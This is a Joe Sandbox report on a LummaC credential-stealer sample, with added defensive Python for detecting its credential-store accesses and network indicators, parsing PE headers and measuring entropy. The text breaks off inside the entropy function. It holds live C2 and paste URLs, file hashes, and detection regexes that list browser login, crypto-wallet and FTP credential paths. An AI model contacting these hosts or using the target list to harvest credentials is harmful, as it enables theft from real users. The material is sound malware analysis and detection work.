      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
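
The file-access rows above are the raw material for a detection: one process, running from the browser cache directory with a .com extension, opening browser login stores, extension storage, wallet directories and FTP client configuration in a single burst. The following Python is an added example written for this page, not part of the Joe Sandbox report and not a Joe Sandbox feature. It groups Sysmon-style file-access events by process image and flags a process that touches several distinct credential categories, or any category at all from an odd location. The event dictionary layout (image/target), the category names and SAMPLE_EVENTS are constructed for the demonstration; the path patterns are taken from the "File opened" rows above.

```python
# Added example (not part of the Joe Sandbox report): triage file-access events
# of the kind listed above to surface a stealer's credential harvest.
# The event format (dicts with image/target) and SAMPLE_EVENTS are constructed;
# the path patterns are derived from the "File opened" rows of the report.
import re
from collections import defaultdict

# One regex list per credential category; each pattern comes from a path the
# report shows Banned.com opening.
TARGET_PATTERNS = {
    "browser_logins": [
        r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data",
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(logins\.json|key4\.db)$",
    ],
    "browser_history": [
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\places\.sqlite$",
    ],
    "browser_extensions": [
        # Chrome extension IDs are 32 characters drawn from a-p
        r"\\Google\\Chrome\\User Data\\[^\\]+\\(Local|Sync) Extension Settings\\[a-p]{32}$",
    ],
    "crypto_wallets": [
        r"\\(Exodus|Ledger Live|atomic|Bitcoin|Binance|Electrum(-LTC)?|Guarda|com\.liberty\.jaxx)(\\|$)",
        r"\\Coinomi\\Coinomi\\wallets$",
    ],
    "ftp_clients": [
        r"\\(FTPbox|FTPGetter|FTPInfo|FTPRush|SmartFTP|SiteDesigner\\3D-FTP)(\\|$)",
    ],
}
COMPILED = {cat: [re.compile(p, re.IGNORECASE) for p in pats]
            for cat, pats in TARGET_PATTERNS.items()}

# Image locations and extensions no legitimate credential consumer runs from
ODD_LOCATION = re.compile(r"\\INetCache\\|\\Temp\\|\\Downloads\\", re.IGNORECASE)
ODD_EXTENSIONS = (".com", ".pif", ".scr")


def classify_path(path: str):
    """Return the credential category a target path belongs to, or None."""
    for cat, regs in COMPILED.items():
        if any(r.search(path) for r in regs):
            return cat
    return None


def is_odd_image(image: str) -> bool:
    return bool(ODD_LOCATION.search(image)) or image.lower().endswith(ODD_EXTENSIONS)


def triage(events, min_categories: int = 2):
    """Aggregate file-access events per process image. A process is reported when it
    touches at least `min_categories` distinct credential categories (a browser opening
    only its own Login Data does not qualify) or when it runs from an odd location or
    extension and touches any category at all."""
    per_proc = defaultdict(lambda: {"categories": set(), "count": 0})
    for ev in events:
        cat = classify_path(ev["target"])
        if cat is None:
            continue
        rec = per_proc[ev["image"]]
        rec["categories"].add(cat)
        rec["count"] += 1
    findings = []
    for image, rec in per_proc.items():
        odd = is_odd_image(image)
        if len(rec["categories"]) >= min_categories or odd:
            findings.append({"image": image, "categories": sorted(rec["categories"]),
                             "count": rec["count"], "odd_location": odd})
    return findings


BANNED = r"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
# Constructed sample events: the first six mirror rows from the report, the rest are benign noise
SAMPLE_EVENTS = [
    {"image": BANNED, "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account"},
    {"image": BANNED, "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn"},
    {"image": BANNED, "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json"},
    {"image": BANNED, "target": r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"},
    {"image": BANNED, "target": r"C:\Users\user\AppData\Roaming\FTPRush"},
    {"image": BANNED, "target": r"C:\Users\user\Documents\BJZFPPWAPT"},
    {"image": CHROME, "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Windows\explorer.exe", "target": r"C:\Users\user\Documents\report.docx"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        flag = " (odd image location/extension)" if f["odd_location"] else ""
        print(f"{f['image']}: {f['count']} credential-store accesses across {f['categories']}{flag}")
```

The two-category threshold is what keeps the browser itself out of the alert: chrome.exe legitimately opens its own Login Data, but nothing legitimate opens Chrome's login store, Firefox's key4.db, an Exodus wallet and an FTP client's favourites within one process. The odd-location rule exists for the case the report shows, where the harvest is done by a PE renamed to Banned.com under INetCache; such a process is worth a look after a single credential access.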

Remote Access Functionality

Source: Yara match; File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix (flattened from the report's 14-column matrix). The bracketed numbers are the signature-count badges the report attaches to a technique, copied as displayed; techniques shown without a badge carry no count in the report.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation [121]; Native API [1]; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection [12]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading [111]; Virtualization/Sandbox Evasion [221]; Process Injection [12]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [1]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping [2]; Input Capture [11]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery [21]; Process Discovery [3]; Virtualization/Sandbox Evasion [221]; Application Window Discovery [1]; File and Directory Discovery [13]; System Information Discovery [25]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Input Capture [11]; Archive Collected Data [1]; Data from Local System [31]; Clipboard Data [1]; Keylogging; GUI Input Capture
Command and Control: Web Service [1]; Encrypted Channel [11]; Ingress Tool Transfer [1]; Non-Application Layer Protocol [3]; Application Layer Protocol [14]; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID 1581739; sample !Set-up..exe; start date 28/12/2024; architecture WINDOWS; score 100)

Contacted hosts:
  rentry.co (172.67.75.40, port 443, CLOUDFLARENETUS, United States); signature: Connects to a pastebin service (likely for C&C)
  fallyjustif.click (172.67.213.115, port 443, CLOUDFLARENETUS, United States)
  xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDi

Top-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected LummaC Stealer; 4 other signatures

Process tree (the number in brackets is the badge the graph shows next to the process):
!Set-up..exe [24]
  cmd.exe [2]
    dropped: C:\Users\user\AppData\Local\...\Banned.com (PE32)
    signature: Drops PE files with a suspicious file extension
    Banned.com [1]
      network: fallyjustif.click 172.67.213.115:443 (client ports 49784, 49790); rentry.co 172.67.75.40:443 (client port 49836)
      dropped: C:\Users\...\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1 (HTML)
      signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); Tries to harvest and steal ftp login credentials; 2 other signatures
      powershell.exe [7]
        conhost.exe
    cmd.exe [2]
    cmd.exe [1]
    9 other processes

Antivirus detection (Source | Detection | Scanner)

Submitted sample:
  !Set-up..exe | 15% | Virustotal
  !Set-up..exe | 16% | ReversingLabs

Dropped files:
  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | 0% | ReversingLabs

Two further AV tables: No Antivirus matches

URLs:
  https://fallyjustif.click/api | 0% | Avira URL Cloud: safe
Contacted domains (Name | IP | Active | Malicious | Reputation)
  fallyjustif.click | 172.67.213.115 | active: true | malicious: true | reputation: unknown
  rentry.co | 172.67.75.40 | active: true | malicious: false | reputation: high
  xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDi | IP unknown | active: unknown | malicious: true | reputation: unknown

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
  https://rentry.co/feouewe5/raw | malicious: false | no detection listed | reputation: high
  https://fallyjustif.click/api | malicious: true | Avira URL Cloud: safe | reputation: unknown
URLs found in memory dumps and dropped files (Name | Source | Malicious | Reputation). The URL strings are reproduced exactly as extracted, including the trailing characters some of them carry in memory.
  https://rentry.co/whathZ#l(M/ | powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp | false | high
  https://rentry.co/whathZ#l | powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp | false | high
  https://aka.ms/pscore6lB | powershell.exe, 00000011.00000002.2787345765.0000000004F61000.00000004.00000800.00020000.00000000.sdmp | false | high
  https://rentry.co/static/icons/512.pnghZ#l | powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp | false | high
  https://rentry.co/ | powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000011.00000002.2787345765.00000000050B9000.00000004.00000800.00020000.00000000.sdmp; Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1.13.dr | false | high
  https://rentry.co/static/icons/512.png | Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1.13.dr | false | high
  https://rentry.co/what | powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000011.00000002.2787345765.00000000050B9000.00000004.00000800.00020000.00000000.sdmp; Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1.13.dr | false | high
  http://www.autoitscript.com/autoit3/X | Banned.com, 0000000D.00000000.2078706005.0000000000785000.00000002.00000001.01000000.00000007.sdmp; Banned.com.2.dr; Ford.9.dr | false | high
  http://nsis.sf.net/NSIS_ErrorError | !Set-up..exe | false | high
  https://www.autoitscript.com/autoit3/ | Writing.9.dr; Banned.com.2.dr | false | high
  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000011.00000002.2787345765.0000000004F61000.00000004.00000800.00020000.00000000.sdmp | false | high
  http://www.teamviewer.com | !Set-up..exe | false | high
  https://rentry.co/hZ#l | powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp | false | high
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
  172.67.213.115 | fallyjustif.click | United States | 13335 | CLOUDFLARENETUS | malicious: true
  172.67.75.40 | rentry.co | United States | 13335 | CLOUDFLARENETUS | malicious: false
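
The network indicators in this report are of three different qualities: fallyjustif.click is attributable to the sample (malicious, C2 endpoint /api); rentry.co is a legitimate paste service with a high reputation, where only the raw-paste fetch by a non-browser process is worth an alert; and both IP addresses belong to Cloudflare (AS13335), so an IP match without a hostname says almost nothing. The following Python is an added example written for this page, not part of the Joe Sandbox report, that applies those distinctions when matching proxy log lines. The log line layout (timestamp, source IP, destination IP, host, path, process name) and SAMPLE_LOG are constructed; the indicator values come from the tables above.

```python
# Added example (not part of the Joe Sandbox report): match proxy log lines against the
# report's network indicators while treating shared Cloudflare infrastructure with the
# caution it needs. The log format (ts src_ip dst_ip host path process) and SAMPLE_LOG
# are constructed; the indicators and their reputations come from the report's tables.
import re
from typing import NamedTuple, Optional

# Indicator data from the report
C2_HOSTS = {"fallyjustif.click": {"/api"}}          # malicious: true; C2 endpoint observed
PASTE_HOSTS = {"rentry.co"}                          # legitimate paste service, reputation high
PASTE_RAW = re.compile(r"^/[A-Za-z0-9]+/raw$")       # shape of the raw-paste URL the sample fetched
SHARED_CDN_IPS = {"172.67.213.115", "172.67.75.40"}  # both AS13335 CLOUDFLARENETUS; shared fronting
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe"}


class Hit(NamedTuple):
    line_no: int
    severity: str
    reason: str


def parse_line(line: str) -> Optional[dict]:
    """Fields: timestamp, src_ip, dst_ip, host (or '-'), path (or '-'), process name."""
    parts = line.split()
    if len(parts) != 6:
        return None
    ts, src, dst, host, path, proc = parts
    return {"ts": ts, "src": src, "dst": dst,
            "host": None if host == "-" else host.lower(),
            "path": None if path == "-" else path,
            "proc": proc.lower()}


def score(rec: dict) -> Optional[tuple]:
    """Return (severity, reason) for one parsed line, or None when nothing matches."""
    host, path, dst, proc = rec["host"], rec["path"], rec["dst"], rec["proc"]
    if host in C2_HOSTS:
        if path in C2_HOSTS[host]:
            return "high", f"C2 endpoint {host}{path}"
        return "high", f"C2 domain {host}"
    if host in PASTE_HOSTS:
        # The domain is benign; only a raw-paste fetch by a non-browser process is suspicious
        if path and PASTE_RAW.match(path) and proc not in BROWSERS:
            return "medium", f"raw paste {host}{path} fetched by {proc}"
        return None
    if host is None and dst in SHARED_CDN_IPS:
        # A bare IP on a shared CDN is not attributable without SNI/Host; record, do not block
        return "low", f"shared CDN address {dst} without host indicator"
    return None


def match_log(lines) -> list:
    hits = []
    for n, line in enumerate(lines, start=1):
        rec = parse_line(line)
        if rec is None:
            continue
        result = score(rec)
        if result:
            hits.append(Hit(n, result[0], result[1]))
    return hits


# Constructed sample log: lines 1 and 2 mirror the sample's traffic, the rest is benign noise
SAMPLE_LOG = [
    "2024-12-28T20:35:40Z 10.0.0.7 172.67.213.115 fallyjustif.click /api Banned.com",
    "2024-12-28T20:35:52Z 10.0.0.7 172.67.75.40 rentry.co /feouewe5/raw powershell.exe",
    "2024-12-28T20:36:01Z 10.0.0.9 172.67.75.40 rentry.co /static/icons/512.png chrome.exe",
    "2024-12-28T20:36:10Z 10.0.0.9 172.67.213.115 - - svchost.exe",
    "2024-12-28T20:36:15Z 10.0.0.9 203.0.113.5 intranet.example / chrome.exe",
    "malformed line",
]

if __name__ == "__main__":
    for h in match_log(SAMPLE_LOG):
        print(f"line {h.line_no}: {h.severity:6} {h.reason}")
```

Blocking 172.67.213.115 or 172.67.75.40 outright would also break every other Cloudflare-fronted site that resolves to those addresses, which is why the IP-only match is scored low and kept for correlation rather than enforcement; the hostname, or the TLS SNI when only the connection is logged, is the indicator that carries weight.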
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1581739
                                        Start date and time:2024-12-28 21:34:11 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 5m 41s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:19
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:!Set-up..exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@29/28@3/2
                                        EGA Information:
                                        • Successful, ratio: 50%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 35
                                        • Number of non-executed functions: 40
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 172.202.163.200
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target powershell.exe, PID 6516 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
  15:35:01 | API Interceptor | 1x Sleep call for process: !Set-up..exe modified
  15:35:42 | API Interceptor | 23x Sleep call for process: Banned.com modified
Similar samples by contacted IP (Match | Associated Sample Name | Detection | Threat Name | Context)
  172.67.213.115
    Outfordelivery389402.xlsm | malicious | IcedID | astrocycle.download/
    HRScheduleH3965005.xlsm | malicious | IcedID | astrocycle.download/
    PI-9823472110866.xlsm | malicious | IcedID | astrocycle.download/
    uhr908723097306.xlsm | malicious | IcedID | astrocycle.download/
    Vac.list07-2021-6014910.xlsm | malicious | IcedID | astrocycle.download/
    List-4527768.xlsm | malicious | IcedID | astrocycle.download/
    HRcontacts7752205.xlsm | malicious | IcedID | astrocycle.download/
    sbf0127365-7431059.xlsm | malicious | IcedID | astrocycle.download/
    Purchaseconfirmation-137606.xlsm | malicious | IcedID | astrocycle.download/
    DeliveryConf535215.xlsm | malicious | IcedID | astrocycle.download/
  172.67.75.40
    zkGOUJOnmc.elf | malicious | Unknown | arc-gym.com.cutestat.com/wp-login.php

Similar samples by contacted domain (Match | Associated Sample Name | Detection | Threat Name | Context)
  rentry.co
    Full-Setup.exe | malicious | LummaC | 104.26.3.16
    Setup.exe | malicious | LummaC Stealer | 172.67.75.40
    taskhost.exe | malicious | XWorm | 104.26.2.16
    file.ps1 | malicious | LummaC Stealer | 104.26.3.16
    bUAmCazc.ps1 | malicious | LummaC Stealer | 104.26.2.16
    IaslcsMo.ps1 | malicious | LummaC Stealer | 172.67.75.40
    IaslcsMo.txt.ps1 | malicious | LummaC Stealer | 172.67.75.40
    owuP726k3d.exe | malicious | AsyncRAT, XWorm | 172.67.75.40
    gkzHdqfg.ps1 | malicious | LummaC Stealer | 172.67.75.40
    xaSPJNbl.ps1 | malicious | LummaC | 172.67.75.40

Similar samples by ASN (Match | Associated Sample Name | Detection | Threat Name | Context). The report repeats this table once per contacted IP; both IPs are in the same ASN, so it is listed once here.
  CLOUDFLARENETUS
    !Setup.exe | malicious | LummaC Stealer | 104.26.3.16
    ZZ2sTsJFrt.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.21.38.84
    FB.html | malicious | Unknown | 104.17.25.14
    http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfh | malicious | Unknown | 104.26.9.163
    http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h | malicious | HTMLPhisher | 104.17.25.14
    Set-up.exe | malicious | LummaC | 104.21.87.112
    test5.exe | malicious | CobaltStrike, Metasploit | 104.21.34.5
    iien1HBbB3.exe | malicious | LummaC | 104.21.66.86
    SgMuuLxOCJ.exe | malicious | LummaC | 104.21.2.51
    oe9KS7ZHUc.exe | malicious | LummaC | 104.21.66.86

Similar samples by match key a0e9f5d64349fb13191bc781f81f42e1 (Associated Sample Name | Detection | Threat Name | Context)
    !Setup.exe | malicious | LummaC Stealer | 172.67.213.115, 172.67.75.40
    Set-up.exe | malicious | LummaC | 172.67.213.115, 172.67.75.40
    iien1HBbB3.exe | malicious | LummaC | 172.67.213.115, 172.67.75.40
    SgMuuLxOCJ.exe | malicious | LummaC | 172.67.213.115, 172.67.75.40
    oe9KS7ZHUc.exe | malicious | LummaC | 172.67.213.115, 172.67.75.40
    MPgkx6bQIQ.exe | malicious | LummaC | 172.67.213.115, 172.67.75.40
    l0zocrLiVW.exe | malicious | LummaC | 172.67.213.115, 172.67.75.40
    SQHE4Hsjo6.exe | malicious | LummaC | 172.67.213.115, 172.67.75.40
    XYQ1pqHNiT.exe | malicious | LummaC | 172.67.213.115, 172.67.75.40
    GHXsFkoroU.exe | malicious | LummaC | 172.67.213.115, 172.67.75.40

Similar samples by dropped file (Match | Associated Sample Name | Detection | Threat Name)
  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
    !Setup.exe | malicious | LummaC Stealer
    SgMuuLxOCJ.exe | malicious | LummaC
    TNyOrM6mIM.exe | malicious | LummaC
    j2nLC29vCy.exe | malicious | LummaC
    es5qBEFupj.exe | malicious | LummaC
    vUcZzNWkKc.exe | malicious | LummaC
    CLaYpUL3zw.exe | malicious | LummaC
    BagsThroat.exe | malicious | LummaC Stealer
    installer_1.05_36.4.exe | malicious | LummaC Stealer
    SoftWare(1).exe | malicious | LummaC
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:modified
                                                            Size (bytes):947288
                                                            Entropy (8bit):6.630612696399572
                                                            Encrypted:false
                                                            SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                            MD5:62D09F076E6E0240548C2F837536A46A
                                                            SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                            SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                            SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: !Setup.exe, Detection: malicious, Browse
                                                            • Filename: SgMuuLxOCJ.exe, Detection: malicious, Browse
                                                            • Filename: TNyOrM6mIM.exe, Detection: malicious, Browse
                                                            • Filename: j2nLC29vCy.exe, Detection: malicious, Browse
                                                            • Filename: es5qBEFupj.exe, Detection: malicious, Browse
                                                            • Filename: vUcZzNWkKc.exe, Detection: malicious, Browse
                                                            • Filename: CLaYpUL3zw.exe, Detection: malicious, Browse
                                                            • Filename: BagsThroat.exe, Detection: malicious, Browse
                                                            • Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
                                                            • Filename: SoftWare(1).exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
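Added example, not part of the Joe Sandbox report: the "File Type" line of the entry above is a libmagic-style reading of the PE headers, and the Preview shows what it is based on (the MZ stub, then "PE..L" where the bytes 0x4C 0x01 after the PE signature are IMAGE_FILE_MACHINE_I386). The Python below reproduces that classification from the COFF Machine field, the optional-header Magic and the Subsystem field, so a dropped file can be typed without executing it. The header it parses is a constructed stand-in built by build_sample_pe(), not the 947288-byte dropped file; the MACHINES and SUBSYSTEMS tables cover the common values only.

```python
import struct

MACHINES = {0x14C: "Intel 80386", 0x8664: "x86-64", 0x1C0: "ARM", 0xAA64: "Aarch64"}
SUBSYSTEMS = {1: "native", 2: "GUI", 3: "console", 9: "Windows CE"}


def describe_pe(data: bytes) -> dict:
    """Walk DOS header -> e_lfanew -> PE signature -> COFF header -> optional header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("e_lfanew does not point at a PE signature")
    machine, n_sections, _ts, _sym, _nsym, opt_size, characteristics = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if opt_size < 70 or opt + 70 > len(data):
        raise ValueError("optional header truncated")
    magic = struct.unpack_from("<H", data, opt)[0]           # 0x10B = PE32, 0x20B = PE32+
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]  # same offset in PE32 and PE32+
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "bits": {0x10B: 32, 0x20B: 64}.get(magic),
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "dll": bool(characteristics & 0x2000),  # IMAGE_FILE_DLL
        "sections": n_sections,
    }


def file_type_string(info: dict) -> str:
    """Mirror the wording of the report's 'File Type' field."""
    kind = "PE32+" if info["bits"] == 64 else "PE32"
    what = "DLL" if info["dll"] else "executable"
    return f"{kind} {what} ({info['subsystem']}) {info['machine']}, for MS Windows"


def build_sample_pe() -> bytes:
    """Constructed stand-in for the dropped file: headers only, no real sections."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)  # e_lfanew
    stub = b"This program cannot be run in DOS mode.\r\n$".ljust(0x80 - 64, b"\x00")
    # Machine i386, 3 sections, arbitrary timestamp, PE32-sized optional header,
    # Characteristics = EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0x62B00000, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)  # Magic: PE32
    struct.pack_into("<H", opt, 68, 2)     # Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
    return bytes(dos) + stub + b"PE\x00\x00" + coff + bytes(opt)


if __name__ == "__main__":
    print(file_type_string(describe_pe(build_sample_pe())))
```

Pointing describe_pe() at a real dropped file is a matter of reading it into bytes; the checks on e_lfanew and the optional-header size are what keep a truncated or deliberately malformed header from turning into an out-of-range read.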
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):496248
                                                            Entropy (8bit):7.999666539358623
                                                            Encrypted:true
                                                            SSDEEP:12288:PuuYPnblMBGjgrSn6caD4u0H2LKwAacxs8C4A9a44PknfCt9xK:GzPOt1caHq2SxVq94Pkf8K
                                                            MD5:11A18CA5A4EC415EE2E991A8A2EFA60A
                                                            SHA1:AD7F7F4763644158A7D1DC22A25D7FA3600AC91F
                                                            SHA-256:44A0272003274F673664E9EAC14FAE1BFC04DEBE7CB58A86A75E7C8D08033F20
                                                            SHA-512:EF4C89749A69680DD5476AADAB0F0A56F5530B0EDA13CB5C432BF608084F48D6968586AD8DB954A860A55C973C466E1DDE3157CEDD49BD47044368DEC750E2C6
                                                            Malicious:false
                                                            Preview:.az$Q..brYk..c\..5.1..#.h...;.o..*.L......o...ho...+?.>.....t...M..1.H1.9d.pi.....HtD...D....6...mr.6..>...7..(@.b.u..~EV...5.X..?B.}..5Q.V......AX..c...}..e..^.S...J.N?..'&H6..r.......,.v.>....(K...p....5..XJ.]...6...o#./.....r./..1.p.. awJ..[:.P...*.`..X.=A....$}...s%.v..8..T........7..P...s.l7....V.."g...6Rx....).......V.e.)d...RRg`.:..T..j`DE.B'........NI'....G.E........8...y.=...~.^(.f..B...i.y.@.......y*......].j.h....c..l1u..s..Rq...T<.].....g{.,sHq.s.Gb.....=.D...W..y..]..].G.L........f".8wF..$....(.I.I.*.\.1..u..*.......%....u..$.Ju.............q...Ad......B...S....Nw..e6z.~.z........".U...5...f..9.L./..la.P >z.B........0T..-.....B.3H. .y..Nd)/.n%...._ue...#0...|...0fg3..v.oX...^..%Tv...@}V.....|g...M.k.T._(....\..WXR...%....hO.....h.(.:!........|..$....(..Q....y......0!l.j...V.Q....:..\*+.&sU.q.R..l....>..~ .....t\.n.4s._...Z.,..1... ......y......K.8~...E.c>R.^z.@S..5...D.;...Q.........QY.v.....1.e....w..'.....-...(...Rn_..i
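Added example, not part of the Joe Sandbox report: the "Entropy (8bit)" field is the Shannon entropy of the byte distribution in bits per byte, and the report flags "Encrypted: true" on the 7.99x files while leaving the 6.6x PE file and the 5.07 batch script at false. The Python below computes that figure, applies a cutoff, and adds a sliding-window profile that shows where a high-entropy blob sits inside a file. The 7.9 cutoff is an assumption chosen to separate the values on this page, not Joe Sandbox's documented threshold, and all inputs are constructed in constructed_samples() (a seeded pseudo-random blob standing in for the encrypted chunks, repeated Set lines standing in for the batch script).

```python
import math
import random
from collections import Counter


def shannon_entropy_8bit(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a single repeated byte, 8.0 for a
    uniform distribution. This is the quantity the report prints as 'Entropy (8bit)'."""
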